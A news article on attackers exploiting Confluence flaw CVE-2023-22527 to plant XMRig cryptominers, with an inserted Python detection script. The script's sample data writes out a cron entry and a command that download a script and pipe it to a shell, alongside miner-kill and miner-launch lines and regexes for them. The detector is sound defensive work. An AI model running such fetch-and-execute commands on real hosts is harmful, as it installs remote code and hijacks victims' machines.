Major Atlassian flaw hacks systems for crypto mining
Multiple groups are competing for control over vulnerable endpoints
Atlassian Confluence Data Center and Confluence Server carried a maximum-severity vulnerability that allowed threat actors to remotely run arbitrary malicious code.
Despite the fix being available for months now, there are many unprotected endpoints out there.
As a result, hackers have been observed installing cryptocurrency miners on these devices, racking up huge electricity bills for the victims and rendering their devices practically unusable.
Fighting for control
This is according to a new report from cybersecurity researchers Trend Micro. Published earlier this week, the report argues that crooks are competing with one another, deleting and installing cryptominers regularly.
The vulnerability is tracked as CVE-2023-22527. It is a critical, 10/10 severity flaw that allows for remote code execution, and it was patched in mid-January this year. However, since mid-June this year, crooks have been scanning for vulnerable instances, dropping the XMRig miner where possible. XMRig is the most popular cryptominer out there, generating the Monero (XMR) cryptocurrency. Monero is described as a privacy coin, as it is virtually untraceable.
“The attacks involve threat actors that employ methods such as the deployment of shell scripts and XMRig miners, targeting of SSH endpoints, killing competing crypto mining processes, and maintaining persistence via cron jobs,” Trend Micro researcher Abdelrahman Esmail said.
The part about “killing competing crypto mining processes” is particularly interesting. The researcher said that there are at least three different actors struggling to maintain control over these endpoints. Once they compromise the device, they will use a shell script to terminate previous miners, delete all existing cron jobs, uninstall cloud security tools, and gather system information. After that, they will set up a channel with the C2 server and launch a new miner.
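The cleanup-then-persist sequence described above lends itself to a simple host-side triage check. The following Python is an added example, not code from the article or from Trend Micro's report: it scans constructed process-list and crontab lines for the behaviours the article names (an XMRig process, a cron job that fetches a script and pipes it into a shell, commands that kill a competing miner or wipe the crontab). The regexes, the sample lines and the documentation-range IP address are assumptions for illustration, not published indicators.

```python
"""Host triage helper for the Confluence cryptomining pattern described above.
Added example, not from the article or Trend Micro. All sample data is constructed."""
import re
from dataclasses import dataclass

# Indicators modelled on the behaviour the article describes. The regexes are
# assumptions for illustration, not published Trend Micro IoCs.
MINER_PATTERNS = {
    "xmrig binary or argument": re.compile(r"\bxmrig\b", re.I),
    "XMRig CLI option": re.compile(r"--donate-level", re.I),
    "mining pool URL": re.compile(r"stratum\+tcps?://", re.I),
}
# A script downloaded and piped straight into a shell (typical cron persistence).
FETCH_AND_EXEC = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b", re.I)
# Competitor cleanup: killing other miners, wiping the existing crontab.
KILL_COMPETITOR = re.compile(r"\b(pkill|killall)\b.*\b(xmrig|miner)\b", re.I)
WIPE_CRON = re.compile(r"\bcrontab\s+-r\b")


@dataclass
class Finding:
    source: str        # "process" or "cron"
    line: str          # the offending line, verbatim
    reasons: list      # human-readable labels of the indicators that fired


def _classify(line: str) -> list:
    """Return the list of indicator labels that match a single line."""
    reasons = [label for label, pat in MINER_PATTERNS.items() if pat.search(line)]
    if FETCH_AND_EXEC.search(line):
        reasons.append("remote script piped to shell")
    if KILL_COMPETITOR.search(line):
        reasons.append("kills competing miner")
    if WIPE_CRON.search(line):
        reasons.append("removes existing crontab")
    return reasons


def scan_processes(ps_lines):
    """Findings for `ps -eo pid,user,args`-style lines that look like miner activity."""
    findings = []
    for line in ps_lines:
        reasons = _classify(line)
        if reasons:
            findings.append(Finding("process", line, reasons))
    return findings


def scan_crontab(cron_lines):
    """Findings for crontab entries that fetch-and-execute or launch a miner."""
    findings = []
    for line in cron_lines:
        if line.lstrip().startswith("#"):   # skip comments
            continue
        reasons = _classify(line)
        if reasons:
            findings.append(Finding("cron", line, reasons))
    return findings


def triage(ps_lines, cron_lines):
    """Combine both scans into a small verdict an on-call responder can act on."""
    findings = scan_processes(ps_lines) + scan_crontab(cron_lines)
    return {
        "findings": findings,
        "miner_running": any(f.source == "process" for f in findings),
        "cron_persistence": any(f.source == "cron" for f in findings),
        "suspicious": bool(findings),
    }


# Constructed sample input: one benign Confluence JVM, one miner, one cleanup shell.
SAMPLE_PS = [
    "  812 confluence /opt/atlassian/confluence/jre/bin/java -Xms1024m -Xmx2048m",
    " 2231 confluence /tmp/.x/xmrig -o pool.example.invalid:3333 --donate-level=0",
    " 2240 confluence sh -c pkill -f xmrig; curl -s http://203.0.113.10/i.sh | bash",
]
# Constructed crontab: one persistence entry beside a legitimate certbot job.
SAMPLE_CRON = [
    "*/5 * * * * curl -s http://203.0.113.10/i.sh | sh",
    "0 2 * * * /usr/bin/certbot renew --quiet",
]

if __name__ == "__main__":
    verdict = triage(SAMPLE_PS, SAMPLE_CRON)
    for f in verdict["findings"]:
        print(f"[{f.source}] {', '.join(f.reasons)}: {f.line.strip()}")
    print("suspicious:", verdict["suspicious"])
```

On a real host the two lists would come from `ps -eo pid,user,args` and from the crontab of every account, including the service account Confluence runs as; a match on the "kills competing miner" label is the clearest sign that more than one actor has been through the box, which changes the scope of the incident.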
“With its continuous exploitation by threat actors, CVE-2023-22527 presents a significant security risk to organizations worldwide,” the researcher added. “To minimize the risks and threats associated with this vulnerability, administrators should update their versions of Confluence Data Center and Confluence Server to the latest available versions as soon as possible.”
Via The Hacker News
Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.